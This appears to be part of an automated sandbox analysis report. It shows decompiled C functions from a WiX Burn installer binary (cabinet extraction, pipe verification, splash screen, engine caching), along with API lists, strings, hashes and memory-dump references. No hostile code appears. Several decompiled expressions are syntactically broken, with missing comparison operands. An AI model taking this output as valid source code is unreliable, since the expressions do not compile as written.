                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InitializeUninitialize
                                                                                                                                                                  • String ID: <the>.cab$Failed to extract all files from container, erf: %d:%X:%d$Failed to initialize COM.$Failed to initialize cabinet.dll.$Failed to reset begin operation event.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp
                                                                                                                                                                  • API String ID: 3442037557-1168358783
                                                                                                                                                                  • Opcode ID: a7e705f6690e14aa345b0b92adff1ea33db04935cacdb157d4933bf4f9833bc3
                                                                                                                                                                  • Instruction ID: c16b7eedfca3f7780ced09ad6c93490718ec9e693c51b8ba4c83565c4ceff0aa
                                                                                                                                                                  • Opcode Fuzzy Hash: a7e705f6690e14aa345b0b92adff1ea33db04935cacdb157d4933bf4f9833bc3
                                                                                                                                                                  • Instruction Fuzzy Hash: CB514B37F50231A7DB209E66BC05B6B76709B04B22FA24267FD01BB281D66DCE0195ED
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040EB2E, Relevance: 33.4, APIs: 10, Strings: 9, Instructions: 180fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 72%
                                                                                                                                                                  			E0040EB2E(void* _a4, short* _a8, intOrPtr* _a12) {
				struct _OVERLAPPED* _v8;
				void _v12;
				long _v16;
				void _v20;
				long _v24;
				void _v28;
				long _t26;
				intOrPtr _t41;
				intOrPtr* _t66;
				void* _t69;
				void* _t70;
				void* _t71;

				_v8 = 0;
				_v12 = 0;
				_v20 = 0;
				_v16 = 0;
				_t26 = GetCurrentProcessId();
				_t69 = _a4;
				_v28 = _t26;
				_v24 = 0;
				if(ReadFile(_t69,  &_v12, 4,  &_v16, 0) != 0) {
					_t31 = _v12 >> 1;
					if(_v12 >> 1 <= 0xff) {
						_t71 = E00433BDF( &_v8, _t31 + 1);
						if(_t71 >= 0) {
							if(ReadFile(_t69, _v8, _v12,  &_v16, 0) != 0) {
								if(CompareStringW(0, 0, _v8, 0xffffffff, _a8, 0xffffffff) == 2) {
									if(ReadFile(_t69,  &_v20, 4,  &_v16, 0) != 0) {
										_t66 = _a12;
										_t41 =  *_t66;
										if(_t41 != 0) {
											if(_t41 == _v20) {
												goto L15;
											} else {
												_t70 = 0x8007000d;
												_t71 = 0x8007000d;
												E004300D9(_t41, "pipe.cpp", 0x375, 0x8007000d);
												_push("Verification process id from parent does not match.");
												goto L4;
											}
										} else {
											 *_t66 = _v20;
											L15:
											if(WriteFile(_t69,  &_v28, 4,  &_v24, 0) == 0) {
												_t74 =  <=  ? GetLastError() : _t47 & 0x0000ffff | 0x80070000;
												_t71 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t47 & 0x0000ffff | 0x80070000;
												E004300D9(0x80004005, "pipe.cpp", 0x37b, _t71);
												_push("Failed to inform parent process that child is running.");
												goto L17;
											}
										}
									} else {
										_t77 =  <=  ? GetLastError() : _t53 & 0x0000ffff | 0x80070000;
										_t71 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t53 & 0x0000ffff | 0x80070000;
										E004300D9(0x80004005, "pipe.cpp", 0x36a, _t71);
										_push("Failed to read verification process id from parent pipe.");
										goto L17;
									}
								} else {
									_t70 = 0x8007000d;
									_t71 = 0x8007000d;
									E004300D9(_t37, "pipe.cpp", 0x364, 0x8007000d);
									_push("Verification secret from parent does not match.");
									goto L4;
								}
							} else {
								_t80 =  <=  ? GetLastError() : _t57 & 0x0000ffff | 0x80070000;
								_t71 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t57 & 0x0000ffff | 0x80070000;
								E004300D9(0x80004005, "pipe.cpp", 0x35d, _t71);
								_push("Failed to read verification secret from parent pipe.");
								goto L17;
							}
						} else {
							_push("Failed to allocate buffer for verification secret.");
							goto L17;
						}
					} else {
						_t70 = 0x8007000d;
						_t71 = 0x8007000d;
						E004300D9(_t31, "pipe.cpp", 0x355, 0x8007000d);
						_push("Verification secret from parent is too big.");
						L4:
						_push(_t70);
						goto L18;
					}
				} else {
					_t83 =  <=  ? GetLastError() : _t61 & 0x0000ffff | 0x80070000;
					_t71 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t61 & 0x0000ffff | 0x80070000;
					E004300D9(0x80004005, "pipe.cpp", 0x34f, _t71);
					_push("Failed to read size of verification secret from parent pipe.");
					L17:
					_push(_t71);
					L18:
					E00430A57();
				}
				if(_v8 != 0) {
					E004380AB(_v8);
				}
				return _t71;
			}















                                                                                                                                                                  0x0040eb39
                                                                                                                                                                  0x0040eb3c
                                                                                                                                                                  0x0040eb3f
                                                                                                                                                                  0x0040eb42
                                                                                                                                                                  0x0040eb45
                                                                                                                                                                  0x0040eb4b
                                                                                                                                                                  0x0040eb4f
                                                                                                                                                                  0x0040eb5c
                                                                                                                                                                  0x0040eb6a
                                                                                                                                                                  0x0040eba7
                                                                                                                                                                  0x0040ebae
                                                                                                                                                                  0x0040ebdd
                                                                                                                                                                  0x0040ebe1
                                                                                                                                                                  0x0040ebfe
                                                                                                                                                                  0x0040ec4f
                                                                                                                                                                  0x0040ec83
                                                                                                                                                                  0x0040ecba
                                                                                                                                                                  0x0040ecbd
                                                                                                                                                                  0x0040ecc1
                                                                                                                                                                  0x0040ed34
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040ed36
                                                                                                                                                                  0x0040ed36
                                                                                                                                                                  0x0040ed46
                                                                                                                                                                  0x0040ed48
                                                                                                                                                                  0x0040ed4d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040ed4d
                                                                                                                                                                  0x0040ecc3
                                                                                                                                                                  0x0040ecc6
                                                                                                                                                                  0x0040ecc8
                                                                                                                                                                  0x0040ecdd
                                                                                                                                                                  0x0040ecf0
                                                                                                                                                                  0x0040ecfa
                                                                                                                                                                  0x0040ed08
                                                                                                                                                                  0x0040ed0d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040ed0d
                                                                                                                                                                  0x0040ecdd
                                                                                                                                                                  0x0040ec85
                                                                                                                                                                  0x0040ec96
                                                                                                                                                                  0x0040eca0
                                                                                                                                                                  0x0040ecae
                                                                                                                                                                  0x0040ecb3
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040ecb3
                                                                                                                                                                  0x0040ec51
                                                                                                                                                                  0x0040ec51
                                                                                                                                                                  0x0040ec61
                                                                                                                                                                  0x0040ec63
                                                                                                                                                                  0x0040ec68
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040ec68
                                                                                                                                                                  0x0040ec00
                                                                                                                                                                  0x0040ec11
                                                                                                                                                                  0x0040ec1b
                                                                                                                                                                  0x0040ec29
                                                                                                                                                                  0x0040ec2e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040ec2e
                                                                                                                                                                  0x0040ebe3
                                                                                                                                                                  0x0040ebe3
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040ebe3
                                                                                                                                                                  0x0040ebb0
                                                                                                                                                                  0x0040ebb0
                                                                                                                                                                  0x0040ebc0
                                                                                                                                                                  0x0040ebc2
                                                                                                                                                                  0x0040ebc7
                                                                                                                                                                  0x0040ebcc
                                                                                                                                                                  0x0040ebcc
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040ebcc
                                                                                                                                                                  0x0040eb6c
                                                                                                                                                                  0x0040eb7d
                                                                                                                                                                  0x0040eb87
                                                                                                                                                                  0x0040eb95
                                                                                                                                                                  0x0040eb9a
                                                                                                                                                                  0x0040ed12
                                                                                                                                                                  0x0040ed12
                                                                                                                                                                  0x0040ed13
                                                                                                                                                                  0x0040ed13
                                                                                                                                                                  0x0040ed19
                                                                                                                                                                  0x0040ed1e
                                                                                                                                                                  0x0040ed23
                                                                                                                                                                  0x0040ed23
                                                                                                                                                                  0x0040ed2e

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(00000000,8000FFFF,00000008,?,0040F03F,?,?,00000008,00000000,?), ref: 0040EB45
                                                                                                                                                                  • ReadFile.KERNEL32(00000008,00000008,00000004,?,00000000,?,0040F03F,?,?,00000008,00000000,?), ref: 0040EB66
                                                                                                                                                                  • GetLastError.KERNEL32(?,0040F03F,?,?,00000008,00000000,?), ref: 0040EB6C
                                                                                                                                                                  • WriteFile.KERNEL32(00000008,?,00000004,0040F03F,00000000,?,0040F03F,?,?,00000008,00000000,?), ref: 0040ECD5
                                                                                                                                                                  • GetLastError.KERNEL32(?,0040F03F,?,?,00000008,00000000,?), ref: 0040ECDF
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to read verification process id from parent pipe., xrefs: 0040ECB3
                                                                                                                                                                  • Failed to allocate buffer for verification secret., xrefs: 0040EBE3
                                                                                                                                                                  • Verification secret from parent is too big., xrefs: 0040EBC7
                                                                                                                                                                  • Failed to read verification secret from parent pipe., xrefs: 0040EC2E
                                                                                                                                                                  • Verification secret from parent does not match., xrefs: 0040EC68
                                                                                                                                                                  • Failed to inform parent process that child is running., xrefs: 0040ED0D
                                                                                                                                                                  • Verification process id from parent does not match., xrefs: 0040ED4D
                                                                                                                                                                  • Failed to read size of verification secret from parent pipe., xrefs: 0040EB9A
                                                                                                                                                                  • pipe.cpp, xrefs: 0040EB90, 0040EBBB, 0040EC24, 0040EC5C, 0040ECA9, 0040ED03, 0040ED41
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileLast$CurrentProcessReadWrite
                                                                                                                                                                  • String ID: Failed to allocate buffer for verification secret.$Failed to inform parent process that child is running.$Failed to read size of verification secret from parent pipe.$Failed to read verification process id from parent pipe.$Failed to read verification secret from parent pipe.$Verification process id from parent does not match.$Verification secret from parent does not match.$Verification secret from parent is too big.$pipe.cpp
                                                                                                                                                                  • API String ID: 3008747291-826945260
                                                                                                                                                                  • Opcode ID: cadf8cff6aef706ef333a32dadecbea014cf4671b927aac3acbb476274c379d5
                                                                                                                                                                  • Instruction ID: 1f9773c724c563c647fa8bfceb3ca0dba960811952104bebcbe29d703853f5a2
                                                                                                                                                                  • Opcode Fuzzy Hash: cadf8cff6aef706ef333a32dadecbea014cf4671b927aac3acbb476274c379d5
                                                                                                                                                                  • Instruction Fuzzy Hash: 9751D572A40215BBE7219AA68C45FAF76B8EF04B11F21023BFE01F71D0D6799D0096ED
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004171DA, Relevance: 33.4, APIs: 12, Strings: 7, Instructions: 143registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 56%
                                                                                                                                                                  			E004171DA(void* __eflags, void** _a4) {
				int _v8;
				int _v12;
				int _v16;
				int _v20;
				void _v24;
				struct tagMSG _v52;
				struct _WNDCLASSW _v92;
				int _t47;
				signed short _t58;
				signed short _t61;
				struct HWND__* _t67;
				signed int _t69;
				void** _t82;
				void* _t83;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t69 = 0xa;
				_push(7);
				memset( &_v52, memset( &_v92, 0, _t69 << 2), 0 << 2);
				_t82 = _a4;
				_t83 = E004170C3(_t82[1],  &_v24);
				if(_t83 >= 0) {
					_v92.lpfnWndProc = E0041737C;
					_v92.hInstance = _t82[1];
					_v92.hCursor = LoadCursorW(0, 0x7f00);
					_v92.lpszClassName = L"WixBurnSplashScreen";
					if(RegisterClassW( &_v92) != 0) {
						_t22 =  &(_v92.lpszClassName); // 0x447aec
						_t67 = CreateWindowExW(0x80,  *_t22, _t82[2], 0x90000000, _v20, _v16, _v12, _v8, 0, 0, _t82[1],  &_v24);
						if(_t67 != 0) {
							 *(_t82[3]) = _t67;
							SetEvent( *_t82);
							while(1) {
								_t47 = GetMessageW( &_v52, 0, 0, 0);
								if(_t47 == 0) {
									break;
								}
								if(_t47 == 0xffffffff) {
									_t83 = 0x8000ffff;
									_push("Unexpected return value from message pump.");
									L13:
									_push(_t83);
									E00430A57();
									L14:
									L15:
									UnregisterClassW(L"WixBurnSplashScreen", _t82[1]);
									if(_v24 != 0) {
										DeleteObject(_v24);
									}
									return _t83;
								}
								if(IsDialogMessageW(_t67,  &_v52) == 0) {
									TranslateMessage( &_v52);
									DispatchMessageW( &_v52);
								}
							}
							goto L14;
						}
						_t58 = GetLastError();
						_t86 =  <=  ? _t58 : _t58 & 0x0000ffff | 0x80070000;
						_t83 =  >=  ? 0x80004005 :  <=  ? _t58 : _t58 & 0x0000ffff | 0x80070000;
						E004300D9(0x80004005, "splashscreen.cpp", 0x96, _t83);
						_push("Failed to create window.");
						goto L13;
					}
					_t61 = GetLastError();
					_t89 =  <=  ? _t61 : _t61 & 0x0000ffff | 0x80070000;
					_t83 =  >=  ? 0x80004005 :  <=  ? _t61 : _t61 & 0x0000ffff | 0x80070000;
					E004300D9(0x80004005, "splashscreen.cpp", 0x90, _t83);
					_push("Failed to register window.");
					goto L13;
				}
				_push("Failed to load splash screen.");
				_push(_t83);
				E00430A57();
				goto L15;
			}

















                                                                                                                                                                  0x004171e7
                                                                                                                                                                  0x004171e8
                                                                                                                                                                  0x004171e9
                                                                                                                                                                  0x004171ea
                                                                                                                                                                  0x004171eb
                                                                                                                                                                  0x004171ee
                                                                                                                                                                  0x004171f1
                                                                                                                                                                  0x004171fc
                                                                                                                                                                  0x004171fe
                                                                                                                                                                  0x0041720d
                                                                                                                                                                  0x00417211
                                                                                                                                                                  0x00417231
                                                                                                                                                                  0x00417238
                                                                                                                                                                  0x00417241
                                                                                                                                                                  0x00417248
                                                                                                                                                                  0x00417258
                                                                                                                                                                  0x004172af
                                                                                                                                                                  0x004172bd
                                                                                                                                                                  0x004172c1
                                                                                                                                                                  0x004172fb
                                                                                                                                                                  0x004172ff
                                                                                                                                                                  0x0041732f
                                                                                                                                                                  0x00417338
                                                                                                                                                                  0x00417340
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041730a
                                                                                                                                                                  0x00417344
                                                                                                                                                                  0x00417349
                                                                                                                                                                  0x0041734e
                                                                                                                                                                  0x0041734e
                                                                                                                                                                  0x0041734f
                                                                                                                                                                  0x00417356
                                                                                                                                                                  0x00417357
                                                                                                                                                                  0x0041735f
                                                                                                                                                                  0x00417369
                                                                                                                                                                  0x0041736e
                                                                                                                                                                  0x0041736e
                                                                                                                                                                  0x00417379
                                                                                                                                                                  0x00417379
                                                                                                                                                                  0x00417319
                                                                                                                                                                  0x0041731f
                                                                                                                                                                  0x00417329
                                                                                                                                                                  0x00417329
                                                                                                                                                                  0x00417319
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00417342
                                                                                                                                                                  0x004172c3
                                                                                                                                                                  0x004172d4
                                                                                                                                                                  0x004172de
                                                                                                                                                                  0x004172ec
                                                                                                                                                                  0x004172f1
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004172f1
                                                                                                                                                                  0x0041725a
                                                                                                                                                                  0x0041726b
                                                                                                                                                                  0x00417275
                                                                                                                                                                  0x00417283
                                                                                                                                                                  0x00417288
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00417288
                                                                                                                                                                  0x00417213
                                                                                                                                                                  0x00417218
                                                                                                                                                                  0x00417219
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 004170C3: LoadBitmapW.USER32 ref: 004170F9
                                                                                                                                                                    • Part of subcall function 004170C3: GetLastError.KERNEL32 ref: 00417105
                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 0041723B
                                                                                                                                                                  • RegisterClassW.USER32 ref: 0041724F
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0041725A
                                                                                                                                                                  • UnregisterClassW.USER32 ref: 0041735F
                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 0041736E
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ClassErrorLastLoad$BitmapCursorDeleteObjectRegisterUnregister
                                                                                                                                                                  • String ID: Failed to create window.$Failed to load splash screen.$Failed to register window.$Unexpected return value from message pump.$WixBurnSplashScreen$splashscreen.cpp$zD
                                                                                                                                                                  • API String ID: 164797020-2755939580
                                                                                                                                                                  • Opcode ID: d1b424e59f646d17b76b112b74011394bdea5906f545a14c3f376848e9a4f4e0
                                                                                                                                                                  • Instruction ID: 4d55ffa0e84129185a4d000a32cb2512c94fcd1dd4a5a8dca163c788eec9446b
                                                                                                                                                                  • Opcode Fuzzy Hash: d1b424e59f646d17b76b112b74011394bdea5906f545a14c3f376848e9a4f4e0
                                                                                                                                                                  • Instruction Fuzzy Hash: 20419072904219BFEB119BA4DC49FEEB7B8FF08304F100126FE15E6150D7359901DBA9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004120C1, Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 204fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 73%
                                                                                                                                                                  			E004120C1(void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12, intOrPtr _a16) {
				signed int _v8;
				char _v20;
				intOrPtr _v24;
				WCHAR* _v28;
				intOrPtr _v32;
				void* __edi;
				void* __esi;
				signed int _t25;
				void* _t31;
				signed short _t51;
				signed short _t54;
				signed short _t57;
				signed short _t62;
				intOrPtr _t66;
				WCHAR* _t67;
				void* _t75;
				signed int _t91;

				_t25 =  *0x4560d0; // 0xae480e18
				_v8 = _t25 ^ _t91;
				_t67 = _a12;
				_t66 = _a16;
				_t76 = _a4;
				_v24 = _a8;
				asm("stosd");
				asm("stosd");
				_v32 = _a4;
				_v28 = _t67;
				asm("stosd");
				_t75 = CreateFileW(_t67, 0x40000000, 5, 0, 2, 0x8000080, 0);
				if(_t75 != 0xffffffff) {
					_t31 = E00436FAF(_t67, _t76, 0, 0, 0, 0);
					_t77 = _t31;
					if(_t31 >= 0) {
						_t12 = _t66 + 8; // 0x1066de8
						_t77 = E0043659F(_v32, _t75,  *_t12, 0, 0);
						if(_t77 >= 0) {
							if( *((intOrPtr*)(_t66 + 0x28)) != 0) {
								_push(0);
								_t17 = _t66 + 0x18; // 0x5dc18bc8
								if(SetFilePointerEx(_t75,  *_t17, 0, 0) != 0) {
									_t18 = _t66 + 0x24; // 0x401129
									if(E004373A3(0, _t75, _t18, 4) >= 0) {
										_push(0);
										_t19 = _t66 + 0x1c; // 0x550008c2
										if(SetFilePointerEx(_t75,  *_t19, 0, 0) != 0) {
											_t20 = _t66 + 0x28; // 0x40112d
											_t77 = E004373A3(0, _t75, _t20, 4);
											if(_t77 < 0) {
												goto L10;
											} else {
												_t21 = _t66 + 0x2c; // 0x401131
												_t77 = E004373A3(0, _t75, _t21, 4);
												if(_t77 < 0) {
													goto L10;
												} else {
													_push(0);
													_t22 = _t66 + 0x20; // 0xec83ec8b
													if(SetFilePointerEx(_t75,  *_t22, 0, 0) != 0) {
														_t77 = E004373A3(0, _t75,  &_v20, 0xc);
														if(_t77 < 0) {
															_push("Failed to zero out original data offset.");
															goto L19;
														}
													} else {
														_t51 = GetLastError();
														_t81 =  <=  ? _t51 : _t51 & 0x0000ffff | 0x80070000;
														_t77 =  >=  ? 0x80004005 :  <=  ? _t51 : _t51 & 0x0000ffff | 0x80070000;
														E004300D9(0x80004005, "cache.cpp", 0x5ec, _t77);
														_push("Failed to seek to original data in exe burn section header.");
														goto L19;
													}
												}
											}
										} else {
											_t54 = GetLastError();
											_t84 =  <=  ? _t54 : _t54 & 0x0000ffff | 0x80070000;
											_t77 =  >=  ? 0x80004005 :  <=  ? _t54 : _t54 & 0x0000ffff | 0x80070000;
											E004300D9(0x80004005, "cache.cpp", 0x5df, _t77);
											_push("Failed to seek to signature table in exe header.");
											goto L19;
										}
									} else {
										L10:
										_push("Failed to update signature offset.");
										goto L19;
									}
								} else {
									_t57 = GetLastError();
									_t87 =  <=  ? _t57 : _t57 & 0x0000ffff | 0x80070000;
									_t77 =  >=  ? 0x80004005 :  <=  ? _t57 : _t57 & 0x0000ffff | 0x80070000;
									E004300D9(0x80004005, "cache.cpp", 0x5d5, _t77);
									_push("Failed to seek to checksum in exe header.");
									L19:
									_push(_t77);
									E00430A57();
								}
							}
						} else {
							_push(_v28);
							E00430A57(_t77, "Failed to copy engine from: %ls to: %ls", _v24);
						}
					} else {
						E00430A57(_t77, "Failed to seek to beginning of engine file: %ls", _v24);
					}
					CloseHandle(_t75);
				} else {
					_t62 = GetLastError();
					_t90 =  <=  ? _t62 : _t62 & 0x0000ffff | 0x80070000;
					_t77 =  >=  ? 0x80004005 :  <=  ? _t62 : _t62 & 0x0000ffff | 0x80070000;
					E004300D9(0x80004005, "cache.cpp", 0x5c5,  >=  ? 0x80004005 :  <=  ? _t62 : _t62 & 0x0000ffff | 0x80070000);
					E00430A57( >=  ? 0x80004005 :  <=  ? _t62 : _t62 & 0x0000ffff | 0x80070000, "Failed to create engine file at path: %ls", _v28);
				}
				return L004267AF(_t77, _v8 ^ _t91, _t75, _t77);
			}




















                                                                                                                                                                  0x004120c7
                                                                                                                                                                  0x004120ce
                                                                                                                                                                  0x004120d4
                                                                                                                                                                  0x004120d8
                                                                                                                                                                  0x004120dc
                                                                                                                                                                  0x004120e7
                                                                                                                                                                  0x004120f1
                                                                                                                                                                  0x004120f6
                                                                                                                                                                  0x004120fd
                                                                                                                                                                  0x00412100
                                                                                                                                                                  0x00412103
                                                                                                                                                                  0x0041210a
                                                                                                                                                                  0x0041210f
                                                                                                                                                                  0x0041215c
                                                                                                                                                                  0x00412161
                                                                                                                                                                  0x00412165
                                                                                                                                                                  0x00412181
                                                                                                                                                                  0x0041218d
                                                                                                                                                                  0x00412191
                                                                                                                                                                  0x004121b1
                                                                                                                                                                  0x004121b7
                                                                                                                                                                  0x004121ba
                                                                                                                                                                  0x004121c6
                                                                                                                                                                  0x00412202
                                                                                                                                                                  0x00412210
                                                                                                                                                                  0x0041221e
                                                                                                                                                                  0x00412221
                                                                                                                                                                  0x0041222d
                                                                                                                                                                  0x00412269
                                                                                                                                                                  0x00412273
                                                                                                                                                                  0x00412277
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00412279
                                                                                                                                                                  0x0041227b
                                                                                                                                                                  0x00412285
                                                                                                                                                                  0x00412289
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041228b
                                                                                                                                                                  0x0041228d
                                                                                                                                                                  0x00412290
                                                                                                                                                                  0x0041229c
                                                                                                                                                                  0x004122df
                                                                                                                                                                  0x004122e3
                                                                                                                                                                  0x004122e5
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004122e5
                                                                                                                                                                  0x0041229e
                                                                                                                                                                  0x0041229e
                                                                                                                                                                  0x004122af
                                                                                                                                                                  0x004122b9
                                                                                                                                                                  0x004122c7
                                                                                                                                                                  0x004122cc
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004122cc
                                                                                                                                                                  0x0041229c
                                                                                                                                                                  0x00412289
                                                                                                                                                                  0x0041222f
                                                                                                                                                                  0x0041222f
                                                                                                                                                                  0x00412240
                                                                                                                                                                  0x0041224a
                                                                                                                                                                  0x00412258
                                                                                                                                                                  0x0041225d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041225d
                                                                                                                                                                  0x00412212
                                                                                                                                                                  0x00412212
                                                                                                                                                                  0x00412212
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00412212
                                                                                                                                                                  0x004121c8
                                                                                                                                                                  0x004121c8
                                                                                                                                                                  0x004121d9
                                                                                                                                                                  0x004121e3
                                                                                                                                                                  0x004121f1
                                                                                                                                                                  0x004121f6
                                                                                                                                                                  0x004122ea
                                                                                                                                                                  0x004122ea
                                                                                                                                                                  0x004122eb
                                                                                                                                                                  0x004122f1
                                                                                                                                                                  0x004121c6
                                                                                                                                                                  0x00412193
                                                                                                                                                                  0x00412193
                                                                                                                                                                  0x0041219f
                                                                                                                                                                  0x004121a4
                                                                                                                                                                  0x00412167
                                                                                                                                                                  0x00412170
                                                                                                                                                                  0x00412175
                                                                                                                                                                  0x004122f3
                                                                                                                                                                  0x00412111
                                                                                                                                                                  0x00412111
                                                                                                                                                                  0x00412122
                                                                                                                                                                  0x0041212c
                                                                                                                                                                  0x0041213a
                                                                                                                                                                  0x00412148
                                                                                                                                                                  0x0041214d
                                                                                                                                                                  0x00412309

                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateFileW.KERNEL32(?,40000000,00000005,00000000,00000002,08000080,00000000,00000000,00000000,74EDA770,00000000,?,00401105,?,00000000,00000000), ref: 00412104
                                                                                                                                                                  • GetLastError.KERNEL32(?,00401414,00000000,?,?,?,?,00401EA4,?,?), ref: 00412111
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,01066DE8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00401414,00000000,?), ref: 004122F3
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to seek to original data in exe burn section header., xrefs: 004122CC
                                                                                                                                                                  • Failed to seek to signature table in exe header., xrefs: 0041225D
                                                                                                                                                                  • Failed to seek to checksum in exe header., xrefs: 004121F6
                                                                                                                                                                  • Failed to seek to beginning of engine file: %ls, xrefs: 0041216A
                                                                                                                                                                  • cache.cpp, xrefs: 00412135, 004121EC, 00412253, 004122C2
                                                                                                                                                                  • Failed to update signature offset., xrefs: 00412212
                                                                                                                                                                  • Failed to zero out original data offset., xrefs: 004122E5
                                                                                                                                                                  • Failed to create engine file at path: %ls, xrefs: 00412142
                                                                                                                                                                  • Failed to copy engine from: %ls to: %ls, xrefs: 00412199
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseCreateErrorFileHandleLast
                                                                                                                                                                  • String ID: Failed to copy engine from: %ls to: %ls$Failed to create engine file at path: %ls$Failed to seek to beginning of engine file: %ls$Failed to seek to checksum in exe header.$Failed to seek to original data in exe burn section header.$Failed to seek to signature table in exe header.$Failed to update signature offset.$Failed to zero out original data offset.$cache.cpp
                                                                                                                                                                  • API String ID: 2528220319-3092846023
                                                                                                                                                                  • Opcode ID: 80dcdb7a7073c8ad5790f0f311c464f4c65919082743803bb90d64447b0aef97
                                                                                                                                                                  • Instruction ID: 6e4f4074a70be7b84d671121ab07f353bc250115d888f1b32a41ee28ab36200f
                                                                                                                                                                  • Opcode Fuzzy Hash: 80dcdb7a7073c8ad5790f0f311c464f4c65919082743803bb90d64447b0aef97
                                                                                                                                                                  • Instruction Fuzzy Hash: 2251E472A406217FFB11AA659C06FBF36A8EF08710F11422BFE00FB181D7688C1196ED
                                                                                                                                                                  Uniqueness

